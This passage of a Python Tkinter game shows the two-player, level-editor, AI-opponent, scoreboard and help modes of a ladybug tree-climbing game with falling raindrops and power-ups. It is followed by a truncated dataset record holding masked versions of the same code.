    checkHome(event, data)
def twoPlayerTimerFired(data):
    """One tick of 2-player mode: both bugs climb, drops spawn, hits resolve."""
    if data.winner != None:
        return
    data.player1Y -= data.speed
    # a bug above y=15 has reached the treetop
    if data.player1Y < 15 and data.player2Y > 15:
        data.winner = "player1"
    if data.player1Y > 40:
        data.time += 1
        drop2Player(data)
    data.player2Y -= data.speed
    if data.player2Y < 15 and data.player1Y > 15:
        data.winner = "player2"
    if data.player2Y > 40:
        data.time += 1
        drop2Player(data)
    if data.player1Y < 15 and data.player2Y < 15:
        data.winner = "tie"
    for pickup in data.powerUps:
        pickup.onTimerFired(data)
    hitPause(data)
    for pickup in data.invincible:
        pickup.onTimerFired(data)
    hitInvincible(data)
    for spider in data.scaryBug:
        spider.onTimerFired(data)
    hitScaryBug(data)
    powerupTimerFired(data)
def powerupTimerFired(data):
    """Advance both players' raindrops, resolve hits, and expire power-ups.

    BUGFIX: hit2Player() used to be called from inside the loop over
    player 1's drops, so (a) it removed items from ``coconuts1`` while
    that list was being iterated, and (b) no collisions at all were
    checked whenever player 1 had no drops on screen -- player 2's hits
    went unresolved.  It is now called exactly once per tick, after
    both drop lists have moved.
    """
    if data.pause1Drop == False:
        for coconut in data.coconuts1:
            coconut.onTimerFired(data)
    if data.pause2Drop == False:
        for coconut in data.coconuts2:
            coconut.onTimerFired(data)
    hit2Player(data)
    # power-up effects wear off once the collector has climbed 120 px
    if data.start1 != None and abs(data.start1 - data.player1Y) >= 120:
        data.pause1Drop = False
        data.Invincible1 = False
    if data.start2 != None and abs(data.start2 - data.player2Y) >= 120:
        data.pause2Drop = False
        data.Invincible2 = False
def twoPlayerRedrawAll(canvas, data):
    """Render the split-screen 2-player view, then any winner overlay."""
    #magic #s for placement on screen
    canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)
    canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)
    # center divider and finish line
    canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)
    canvas.create_line(0,20, data.width, 20)
    for coconut in data.coconuts1: coconut.draw(canvas)
    for coconut in data.coconuts2: coconut.draw(canvas)
    drawPowerups(canvas, data)
    canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)
    canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)
    canvas.create_text(50,40, text = "Player 1",font = "Arial 15 bold",
                        fill = "yellow")
    canvas.create_text(450,40, text = "Player 2",font = "Arial 15 bold",
                        fill = "yellow")
    winner(canvas, data)
    drawHome(canvas, data)
def winner(canvas, data):
    """Draw the end-of-game overlay once somebody (or both) reaches the top."""
    banners = {
        "player1": "You Made it! Player 1",
        "player2": "You Made it! Player 2",
        "tie": "Tie! You Both Made it!",
    }
    banner = banners.get(data.winner)
    if banner is None:
        return
    # identical overlay for every outcome; only the banner text differs
    canvas.create_rectangle(0, 0, data.width, data.height, fill="black")
    canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width / 2, 100, text=banner,
                       font="Arial 23 bold", fill="yellow")
####################################
# editor mode
####################################
def editorKeyPressed(event, data):
    """Pressing 'r' resets everything back to the splash screen."""
    if event.keysym == "r":
        init(data)
def editorMousePressed(event, data):
    """Handle clicks on the level-editor option buttons."""
    checkHome(event, data)
    # top row: the player's climb speed
    if data.easyY - data.r <= event.y <= data.easyY + data.r:
        options = [(data.easyX, "slow", "slow", ("medium", "fast")),
                   (data.medX, "medium", "medium", ("slow", "fast")),
                   (data.hardX, "fast", "fast", ("slow", "medium"))]
        for center_x, label, chosen_attr, other_attrs in options:
            if center_x - 2 * data.r <= event.x <= center_x + 2 * data.r:
                data.yourSpeed = label
                setattr(data, chosen_attr, data.click)
                for other in other_attrs:
                    setattr(data, other, data.notClick)
    checkMiddle(event, data)
    checkLast(event, data)
def checkMiddle(event, data):
    """Handle clicks on the middle editor row (rain-speed buttons)."""
    # the row's y-center reuses data.medX (400) as a coordinate
    if data.medX - data.r <= event.y <= data.medX + data.r:
        options = [(data.easyX, "drizzle", "drizzle", ("rain", "thunderstorm")),
                   (data.medX, "rain", "rain", ("drizzle", "thunderstorm")),
                   (data.hardX, "thunderstorm", "thunderstorm",
                    ("drizzle", "rain"))]
        for center_x, label, chosen_attr, other_attrs in options:
            if center_x - 2 * data.r <= event.x <= center_x + 2 * data.r:
                data.rainSpeed = label
                setattr(data, chosen_attr, data.click)
                for other in other_attrs:
                    setattr(data, other, data.notClick)
def checkLast(event, data):
    """Handle the yes/no power-up buttons and the enter button."""
    if data.last - data.r <= event.y <= data.last + data.r:
        if data.easyY - 2 * data.r <= event.x <= data.easyY + 2 * data.r:
            data.powerUpsEditor = True
            data.yes, data.no = data.click, data.notClick
        if data.last - 2 * data.r <= event.x <= data.last + 2 * data.r:
            data.powerUpsEditor = False
            data.no, data.yes = data.click, data.notClick
    # enter only responds once changeEnter has lit it up (all options chosen)
    if data.enter == data.click:
        if data.enterX - data.r <= event.y <= data.enterX + data.r:
            if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
                data.mode = "levelCreated"
def drawButtons(canvas, data):
    """Draw the three editor option rows (your speed, rain speed, power-ups)."""
    #makes each button
    # NOTE(review): also stashes the shared font/fill on data for changeEnter
    data.font, data.fill = "Helvetica 13 bold", "yellow"
    canvas.create_text(data.medX,data.YST, text= "Your Speed:",
                        font = data.font,fill =data.fill)
    canvas.create_image(data.easyX,data.easyY, image = data.slow)
    canvas.create_text(data.easyX,data.easyY, text="Slow", font = data.font)
    canvas.create_image(data.medX,data.easyY, image = data.medium)
    canvas.create_text(data.medX,data.easyY, text="Medium", font = data.font)
    canvas.create_image(data.hardX,data.easyY, image = data.fast)
    canvas.create_text(data.hardX,data.easyY, text="Fast",font = data.font)
    # middle row reuses data.medX (400) as its y-coordinate
    canvas.create_image(data.easyX,data.medX, image = data.drizzle)
    canvas.create_text(data.medX,data.RST, text= "Rain Speed:",
                        font = data.font,fill =data.fill)
    canvas.create_text(data.easyX,data.medX, text="Drizzle",font = data.font)
    canvas.create_image(data.medX,data.medX, image = data.rain)
    canvas.create_text(data.medX,data.medX, text="Rain",font = data.font)
    canvas.create_image(data.hardX,data.medX, image = data.thunderstorm)
    canvas.create_text(data.hardX,data.medX, text="Heavy",font = data.font)
    canvas.create_text(data.medX,data.PUT, text= "PowerUps?",
                        font = data.font,fill =data.fill)
    canvas.create_image(data.easyY,data.last, image = data.yes)
    canvas.create_text(data.easyY,data.last, text="Yes",font = data.font)
    canvas.create_image(data.last,data.last, image = data.no)
    canvas.create_text(data.last,data.last, text="No",font = data.font)
    changeEnter(canvas, data)
def changeEnter(canvas, data):
    """Light up the enter button once every option is chosen, then draw it."""
    all_chosen = (data.powerUpsEditor != None and data.yourSpeed != None
                  and data.rainSpeed != None)
    if all_chosen:
        data.enter = data.click
    canvas.create_image(data.medX, data.enterX, image=data.enter)
    canvas.create_text(data.medX, data.enterX, text="Enter", font=data.font)
def editorTimerFired(data):
    """Animate the decorative background rain on the editor screen."""
    data.editorTime += 1
    if data.editorTime % 2 == 0:
        # spawn a new background drop every other tick
        rainDrop(data)
    for backgroundDrop in data.editorDrops:
        backgroundDrop.onTimerFired(data)
def rainDrop(data):
    """Add one background raindrop at a random column across the screen."""
    data.editorDrops.append(Coconuts(random.randint(0, data.width), 0))
def editorRedrawAll(canvas, data):
    """Render the level-editor screen: background, rain, title, buttons."""
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_image(data.width/2, data.height/2, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    canvas.create_text(data.width/2, data.S_P -10, text = "Edit Your Level!",
                        font="Arial 23 bold", fill = "yellow")
    drawButtons(canvas, data)
    drawHome(canvas, data)
####################################
# levelCreated mode
####################################
def setEverything(data):
    """Translate the editor's selections into numeric speeds.

    Leaves data.speed / data.rSpeed untouched for unrecognized values.
    """
    player_speeds = {"slow": 6, "medium": 10, "fast": 14}
    # rSpeed is a spawn-interval divisor: smaller means heavier rain
    rain_speeds = {"thunderstorm": 7, "rain": 10, "drizzle": 13}
    if data.yourSpeed in player_speeds:
        data.speed = player_speeds[data.yourSpeed]
    if data.rainSpeed in rain_speeds:
        data.rSpeed = rain_speeds[data.rainSpeed]
def levelCoconutShot(data):
    """Spawn raindrops for the custom level; rate driven by data.rSpeed."""
    if data.levelEditorLives > 0:
        if data.time % int(0.35 * data.rSpeed) == 0:
            edge_left = random.randint(0, data.Player1Min - data.buffer)
            edge_right = random.randint(770, 870)
            middle = random.randint(220, 770)
            data.coconuts.append(Coconuts(middle, 0))
            data.coconuts.append(Coconuts(edge_left, 0))
            data.coconuts.append(Coconuts(edge_right, 0))
        if data.time % int(0.55 * data.rSpeed) == 0:
            far_left = random.randint(0, 220)
            center = random.randint(220, 770)
            data.coconuts.append(Coconuts(far_left, 0))
            data.coconuts.append(Coconuts(center, 0))
        if data.time % int(data.rSpeed) == 0:
            side = random.choice(data.sides)
            if side == "l":
                data.coconuts.append(Coconuts(3 * data.width / 8 - 20, 0))
            elif side == "r":
                data.coconuts.append(Coconuts(7 * data.width / 8 + 40, 0))
                # NOTE(review): the extra mid-screen drop only spawns on the
                # "r" branch in the original -- preserved as-is
                data.coconuts.append(Coconuts(random.randint(220, 770), 0))
    levelPowerUp(data)
def levelPowerUp(data):
    """Periodically drop power-ups and spiders in the custom level.

    Does nothing unless the player enabled power-ups in the editor
    (data.powerUpsEditor is True).
    """
    if data.powerUpsEditor != True:
        return
    tick = data.time
    # pause power-up every 20 ticks, but skipped on multiples of 40
    if tick % 20 == 0 and tick % 40 != 0:
        data.powerUps.append(PowerUps(random.choice(data.spotList), 0))
    if tick % 30 == 0:
        data.invincible.append(Invincible(random.choice(data.spotList), 0))
    if tick % 35 == 0:
        # spiders crawl up from the bottom (y=750)
        data.scaryBug.append(ScaryBug(random.choice(data.spotList), 750))
def levelCreatedKeyPressed(event, data):
    """Keys in the custom level: 'r' restarts the app, arrows shift the bug
    half a lane while it still has lives and stays inside the tree bounds."""
    key = event.keysym
    if key == "r":
        init(data)
    if data.levelEditorLives > 0:
        half_lane = data.lane / 2
        if key == "Left" and data.cx >= 317:
            data.cx -= half_lane
        elif key == "Right" and data.cx <= 740:
            data.cx += half_lane
def levelCreatedMousePressed(event, data):
    # The home button is the only clickable element while playing a custom level.
    checkHome(event, data)
def levelCreatedTimerFired(data):
    """Per-tick update for the custom level: climb, spawn, move, collide."""
    # re-apply the editor choices every tick (cheap; keeps settings current)
    setEverything(data)
    if data.levelEditorLives>0:
        data.cy-=data.speed          # bug climbs upward
        if data.cy < 15:
            data.level +=1           # reached the top => level cleared
        if data.cy>40:
            data.time +=1
            if data.pauseDrops !=True: levelCoconutShot(data)
    # without power-ups: only coconuts need moving/colliding
    if data.powerUpsEditor == False:
        for coconut in data.coconuts: coconut.onTimerFired(data)
        hit(data)
    # with power-ups: also move/collide pause drops, stars, and spiders
    if data.powerUpsEditor == True:
        for powerUp in data.powerUps: powerUp.onTimerFired(data)
        hitPause(data)
        for powerUp in data.invincible: powerUp.onTimerFired(data)
        hitInvincible(data)
        for bug in data.scaryBug: bug.onTimerFired(data)
        hitScaryBug(data)
        for coconut in data.coconuts:
            if data.pauseDrops == False:coconut.onTimerFired(data)
        if data.beInvincible == False: hit(data)
        if data.start != None:
            #to make powerups only active for set amount of time
            # effect expires after climbing 120px past where it was collected
            if abs(data.start-data.cy) >= 120:
                data.pauseDrops, data.beInvincible = False, False
def levelCreatedRedrawAll(canvas, data):
    """Render the custom level: scene, drops, bug, HUD, and win/lose overlays."""
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_line(0,20, data.width, 20)
    for coconut in data.coconuts: coconut.draw(canvas)
    if data.powerUpsEditor == True: drawPowerups(canvas, data)
    canvas.create_image(data.cx, data.cy, image=data.ladyBug)
    canvas.create_text(data.width/6,100,
                    text ="Total Lives: %d" %data.levelEditorLives,
                    font = "Arial 20 bold", fill = "yellow")
    canvas.create_text(data.width/2,660,
                text ="""You lose a life for hitting a drop
    & don't get eaten!""",
                font = "Arial 15 bold", fill = "yellow")
    # lose overlay: out of lives
    if data.levelEditorLives <=0:
        canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
        canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)
        canvas.create_text(data.width/2,data.height/4,
                        text = "You Lose! Better Luck Next Time!",
                        font = "Helvetica 23 bold", fill = "yellow")
    # win overlay: the bug reached the top at least once
    if data.level > 1: winEditor(canvas, data)
    drawHome(canvas, data)
def winEditor(canvas, data):
    #screen for when you win
    # Full-screen victory overlay for the custom level.
    canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
    canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width/2,100, text = "You Made it!",
                        font = "Arial 23 bold", fill = "yellow")
####################################
# AI Difficulty Mode
####################################
def difficultyKeyPressed(event,data):
    # 'r' resets the entire app back to the splash screen.
    if event.keysym == "r": init(data)
def drawDifficulties(canvas, data):
    """Draw the Easy/Medium/Hard buttons; reveal Enter once one is chosen."""
    canvas.create_text(data.medX,data.AITY, text= "Computer Difficulty:",
                        font="Arial 23 bold", fill = "yellow")
    canvas.create_image(data.easyX, data.easyY, image=data.slow)
    canvas.create_text(data.easyX,data.easyY, text="Easy")
    canvas.create_image(data.medX, data.easyY, image=data.medium)
    canvas.create_text(data.medX,data.easyY, text="Medium")
    canvas.create_image(data.hardX, data.easyY, image=data.fast)
    canvas.create_text(data.hardX,data.easyY, text="Hard")
    if data.difficulty !=None:
        # NOTE(review): state mutation inside a draw routine -- flipping
        # data.enter to the "clicked" image is what arms the Enter button
        # checked by difficultyMousePressed.
        data.enter = data.click
        canvas.create_image(data.medX, data.enterY, image=data.enter)
        canvas.create_text(data.medX,data.enterY, text="Enter")
def difficultyMousePressed(event, data):
    """Handle clicks on the difficulty screen: pick a level, then Enter
    (once armed by drawDifficulties) switches to AI mode."""
    checkHome(event, data)
    # difficulty buttons all share the same row
    if data.easyY - data.r <= event.y <= data.easyY + data.r:
        buttons = [
            (data.easyX, data.difS, "slow", ("medium", "fast")),
            (data.medX, data.difM, "medium", ("slow", "fast")),
            (data.hardX, data.difH, "fast", ("slow", "medium")),
        ]
        for center_x, level, picked, others in buttons:
            if center_x - 2 * data.r <= event.x <= center_x + 2 * data.r:
                data.difficulty = level
                setattr(data, picked, data.click)
                for name in others:
                    setattr(data, name, data.notClick)
    # Enter is live only after a difficulty was chosen
    if data.enter == data.click:
        if data.enterY - data.r <= event.y <= data.enterY + data.r:
            if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
                data.mode = "AI"
def difficultyTimerFired(data):
    """Animate the decorative background rain on the difficulty screen."""
    # makes normal background rain
    data.editorTime = data.editorTime + 1
    if data.editorTime % 2 == 0:
        rainDrop(data)  # fresh drop every other tick
    for raindrop in data.editorDrops:
        raindrop.onTimerFired(data)
def rainDrop(data):
    # Spawn one decorative background raindrop at a random x along the top.
    # NOTE(review): duplicate of the earlier rainDrop definition; this later
    # binding is the one actually used at runtime.
    xPosition = random.randint(0,data.width)
    data.editorDrops.append(Coconuts(xPosition,0))
def difficultyRedrawAll(canvas, data):
    # Difficulty screen: backdrop, overlay, rain, buttons, home.
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_image(data.width/2, data.height/2, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    drawDifficulties(canvas, data)
    drawHome(canvas, data)
####################################
# AI mode
####################################
def hitAI1(data, distance):
    """Computer player's dodge-and-collision step.

    For each falling drop near the computer bug: when the drop (or an
    incoming spider, via AISwitchBug) is within *distance* pixels above the
    bug, a dice roll weighted by data.difficulty decides whether the computer
    dodges by swapping between its two lanes (x=150 / x=340).  Any drop that
    actually overlaps the bug knocks it down 50 pixels and is removed.
    """
    # Iterate over a snapshot: the body removes coconuts from the live list,
    # and removing from the list being iterated skips the next element.
    for coconut in data.coconutsAI1[:]:
        # dodge logic: drop closing in from above
        if (data.player1Y-data.r - coconut.y<=distance) and \
                data.switchOnProgress == False:
            if coconut.x>=data.player1X-data.r and \
                coconut.x<=data.player1X+data.r or AISwitchBug(data,distance)==True:
                testInt = random.randint(0,9)
                # higher data.difficulty => dodges more often
                if testInt<= data.difficulty:
                    data.switchOnProgress= True
                    if data.player1X == 150:
                        data.player1X = 340
                    else:
                        data.player1X = 150
                    data.switchOnProgress= False
        # actual hit: overlap on both axes costs 50px of climb
        if coconut.y>=data.player1Y-data.r and coconut.y<=data.player1Y+data.r:
            if coconut.x>=data.player1X-data.r and \
                coconut.x<=data.player1X+data.r:
                data.player1Y+=50
                data.coconutsAI1.remove(coconut)
def AISwitchBug(data, distance):
    """Return True when a spider is bearing down on the computer bug's lane.

    Used by hitAI1 so the computer also dodges spiders, not just drops.
    Returns None (falsy) when no spider qualifies.
    """
    top_edge = data.player1Y - data.r
    for spider in data.scaryBug:
        closing_in = (top_edge - spider.y <= distance
                      and data.switchOnProgress == False)
        if closing_in:
            in_lane = (data.player1X - data.r <= spider.x
                       <= data.player1X + data.r)
            if in_lane:
                return True
def hitAI2(data, distance):
    """Apply drop collisions to the human player's bug.

    Any coconut overlapping the bug (within data.r on both axes) knocks the
    player down 50 pixels and is removed.  *distance* is accepted for
    signature symmetry with hitAI1 but is not used here.
    """
    # Iterate over a snapshot: removing from the list being iterated would
    # skip the element right after each removed coconut.
    for coconut in data.coconutsAI2[:]:
        if coconut.y>=data.player2Y-data.r and coconut.y<=data.player2Y+data.r:
            if coconut.x>=data.player2X-data.r and \
                coconut.x<=data.player2X+data.r:
                data.player2Y+=50
                data.coconutsAI2.remove(coconut)
def coconutShotAI(data):
    """Spawn mirrored raindrops for both halves of the AI race.

    The right half (human) mirrors the left half (computer) by an x offset
    of 410, so both players face an identical drop pattern unless one side's
    pause power-up is active.
    """
    if data.winner ==None:
        # randomize position of drops off of tree
        if data.time%15==0:
            xPosition1 = random.randint(0,385)
            # keep a safe gap around the two lane centers (~100 and ~360)
            if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40:
                if data.pause1Drop != True:
                    data.coconutsAI1.append(Coconuts(xPosition1,0))
                if data.pause2Drop != True:
                    data.coconutsAI2.append(Coconuts(xPosition1 +410,0))
        if data.time%8 ==0:
            # edge drops: far left strip and far right strip of each half
            xPosition2 = random.randint(0,80)
            xPosition3 = random.randint(364, 385)
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(xPosition2,0))
                data.coconutsAI1.append(Coconuts(xPosition3,0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(xPosition2+410,0))
                data.coconutsAI2.append(Coconuts(xPosition3+410,0))
        addExtraCoconut(data)
        addPowerUpsAI(data)
def addExtraCoconut(data):
    """Add drops hugging the tree edges, plus periodic pause power-ups.

    NOTE(review): despite the name, the second half spawns PowerUps, not
    coconuts -- confirm before renaming or moving it.
    """
    #adds drops to edges of trees
    if data.time % (18) ==0:
        # same random side for both halves keeps the race fair
        side = random.choice(data.sides)
        if side == "l":
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(140,0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(540,0))
        elif side =="r":
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(344,0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(755,0))
    if data.time % 37 == 0:
        side = random.choice(data.sides)
        if side == "l":
            if data.pause1Drop != True:
                data.powerUps.append(PowerUps(140,0))
            if data.pause2Drop != True:
                data.powerUps.append(PowerUps(550,0))
        elif side =="r":
            if data.pause1Drop != True:
                data.powerUps.append(PowerUps(344,0))
            if data.pause2Drop != True:
                data.powerUps.append(PowerUps(755,0))
def addPowerUpsAI(data):
    """Spawn invincibility stars and spiders symmetrically for both halves."""
    #randomly add powerups on tree
    if data.time%33 == 0:
        side = random.choice(data.sides)
        if side == "l":
            if data.pause1Drop != True:
                data.invincible.append(Invincible(140,0))
            if data.pause2Drop != True:
                data.invincible.append(Invincible(550,0))
        elif side =="r":
            if data.pause1Drop != True:
                data.invincible.append(Invincible(344,0))
            if data.pause2Drop != True:
                data.invincible.append(Invincible(755,0))
    if data.time %66==0:
        # spiders start at the bottom (y=750) and crawl up
        side = random.choice(data.sides)
        if side == "l":
            data.scaryBug.append(ScaryBug(140,750))
            data.scaryBug.append(ScaryBug(550,750))
        elif side =="r":
            data.scaryBug.append(ScaryBug(344,750))
            data.scaryBug.append(ScaryBug(750,750))
def AIKeyPressed(event, data):
    """Key handler for AI mode: 'r' restarts; arrows toggle the human bug
    between its two lanes (x=550 left, x=750 right) until a winner exists."""
    key = event.keysym
    if key == "r":
        init(data)
    if data.winner is not None:
        return  # race decided: ignore movement keys
    if key == "Left" and not data.onLeft1:
        data.onLeft1, data.player2X = True, 550
    elif key == "Right" and data.onLeft1:
        data.onLeft1, data.player2X = False, 750
# Only the home button is clickable during the AI race.
def AIMousePressed(event, data): checkHome(event, data)
def AITimerFired(data):
    """Per-tick update for the AI race: collide, move, climb, decide winner."""
    if data.winner == None:
        #want to check hit twice (before & after elements move)
        if data.Invincible1 == False:hitAI1(data, 31)
        if data.Invincible2 == True: pass
        elif data.Invincible2 == False:hitAI2(data, 31)
        # advance both halves' drops (frozen while that side's pause is active)
        for coconut in data.coconutsAI1:
            if data.pause1Drop == False:coconut.onTimerFired(data)
        for coconut in data.coconutsAI2:
            if data.pause2Drop == False:coconut.onTimerFired(data)
        # second check
        if data.Invincible1 == False:hitAI1(data,13)
        if data.Invincible2 == True:pass
        elif data.Invincible2 == False:hitAI2(data,13)
        data.player1Y-=data.speedAI
        #establishing winer
        # first across y=15 wins; crossing on the same tick is a tie (below)
        if data.player1Y < 15 and data.player2Y >15: data.winner= "player1"
        if data.player1Y>40:
            data.time +=1
            coconutShotAI(data)
        data.player2Y-=data.speedAI
        if data.player2Y < 15 and data.player1Y> 15: data.winner= "player2"
        if data.player2Y>40:
            data.time +=1
            coconutShotAI(data)
        if data.player1Y < 15 and data.player2Y <15: data.winner = "tie"
        for powerUp in data.powerUps: powerUp.onTimerFired(data)
        hitPause(data)
        powerUpAITimerFired(data)
def powerUpAITimerFired(data):
    """Advance stars and spiders and expire active power-up effects."""
    #moves both sides symmetrically
    for powerUp in data.invincible:
        powerUp.onTimerFired(data)
        hitInvincible(data)
    for bug in data.scaryBug:
        bug.onTimerFired(data)
        hitScaryBug(data)
    # each player's effect expires after climbing 120px past pickup height
    if data.start1 != None:
        if abs(data.start1-data.player1Y) >= 120:
            data.pause1Drop = False
            data.Invincible1 = False
    if data.start2 != None:
        if abs(data.start2-data.player2Y) >= 120:
            data.pause2Drop = False
            data.Invincible2 = False
def AIRedrawAll(canvas, data):
    """Render the split-screen AI race: computer on the left, human right."""
    canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)
    canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)
    # divider between the two halves, and the finish line at y=20
    canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)
    canvas.create_line(0,20, data.width, 20)
    for coconut in data.coconutsAI1:
        coconut.draw(canvas)
    for coconut in data.coconutsAI2:
        coconut.draw(canvas)
    canvas.create_text(50,40, text = "Computer",font = "Arial 15 bold",
                        fill = "yellow")
    canvas.create_text(450,40, text = "Player 1",font = "Arial 15 bold",
                        fill = "yellow")
    drawPowerups(canvas, data)
    canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)
    canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)
    # overlays the end screen once data.winner is set
    AIWinner(canvas, data)
    drawHome(canvas, data)
def AIWinner(canvas, data):
    """Draw the end-of-race overlay once a winner has been decided.

    No-op while data.winner is still None.  The three outcomes share the
    same backdrop and differ only in the headline text.
    """
    messages = {
        "player1": "The Computer Won :(",
        "player2": "You Made it! You Won!",
        "tie": "Tie! You Both Made it!",
    }
    message = messages.get(data.winner)
    if message is not None:
        _drawAIWinScreen(canvas, data, message)

def _drawAIWinScreen(canvas, data, message):
    # Shared victory backdrop: blackout, win screen, bug sprite, headline.
    canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
    canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width/2,100, text = message,
                        font = "Arial 23 bold", fill = "yellow")
####################################
# ScoreBoard mode
####################################
def scoreboardKeyPressed(event, data):
    # 'r' resets the entire app back to the splash screen.
    if event.keysym == "r": init(data)
# Only the home button is clickable on the scoreboard screen.
def scoreboardMousePressed(event, data): checkHome(event, data)
def scoreboardTimerFired(data):
    # Reuse the difficulty screen's background-rain animation.
    difficultyTimerFired(data)
def scoreboardRedrawAll(canvas, data):
    """Draw the high-score screen: backdrop, rain, headings, and top scores.

    score.txt is re-read on every redraw so a game finished in another mode
    shows up immediately; each line has the form "score,player".
    """
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_image(data.width/2, data.tbgY, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    canvas.create_text(data.width/2, data.txtTScore, text="Top Scores!",
                        font = "Arial 30 bold", fill = "yellow")
    canvas.create_text(data.width/2, data.S_P, text="Score_Player",
                        font = "Arial 20 bold", fill = "yellow")
    drawHome(canvas, data)
    # reload and parse the saved scores (fixes a former bare no-op statement)
    data.savedScores = readFile("score.txt")
    scores = [line.split(",") for line in data.savedScores.splitlines()]
    # numeric sort by score, then show the top data.numScores entries, best first
    scores.sort(key=lambda entry: int(entry[0]))
    top5 = scores[-data.numScores:]
    top5.reverse()
    for i in range(len(top5)):
        canvas.create_text(data.width/2, data.scoreShift+(i*50),
                            text = top5[i],
                            font = "Arial 18 bold", fill = "yellow")
####################################
# help mode
####################################
def helpKeyPressed(event, data):
    # 'r' resets the entire app back to the splash screen.
    if event.keysym == "r": init(data)
# Only the home button is clickable on the help screen.
def helpMousePressed(event, data): checkHome(event, data)
def helpTimerFired(data):
    # Reuse the difficulty screen's background-rain animation.
    difficultyTimerFired(data)
def helpRedrawAll(canvas, data):
    # Help screen: static instructions image with the rain animation on top.
    canvas.create_image(data.width/2, data.helpY, image=data.helpScreen)
    for drop in data.editorDrops:
        drop.draw(canvas)
    drawHome(canvas, data)
#######################################
# use the run function as-is from notes
#######################################
def run(width=15000, height=25000):
    """Build the Tk window, wire mouse/key/timer events, and start the loop.

    Standard 15-112-style animation framework: mode dispatch happens in the
    top-level mousePressed/keyPressed/timerFired/redrawAll functions.
    NOTE(review): the 15000x25000 defaults look like placeholders -- the game
    is actually launched with run(1000, 1000); confirm before relying on them.
    """
    def redrawAllWrapper(canvas, data):
        canvas.delete(ALL)
        redrawAll(canvas, data)
        canvas.update()
    def mousePressedWrapper(event, canvas, data):
        mousePressed(event, data)
        redrawAllWrapper(canvas, data)
    def keyPressedWrapper(event, canvas, data):
        keyPressed(event, data)
        redrawAllWrapper(canvas, data)
    def timerFiredWrapper(canvas, data):
        timerFired(data)
        redrawAllWrapper(canvas, data)
        # pause, then call timerFired again
        canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)
    # Set up data and call init
    class Struct(object): pass
    data = Struct()
    data.width = width
    data.height = height
    data.timerDelay = 100 # milliseconds
    # create the root and the canvas
    root = Tk()
    init(data)
    canvas = Canvas(root, width=data.width, height=data.height)
    canvas.pack()
    # set up events
    root.bind("<Button-1>", lambda event:
                            mousePressedWrapper(event, canvas, data))
    root.bind("<Key>", lambda event:
                            keyPressedWrapper(event, canvas, data))
    timerFiredWrapper(canvas, data)
    # and launch the app
    root.mainloop()  # blocks until window is closed
    print("bye!")
run(1000, 1000)
|
normal
|
{
"blob_id": "c893095be88636e6cb06eb3b939d8106fbb7a8ca",
"index": 470,
"step-1": "<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 
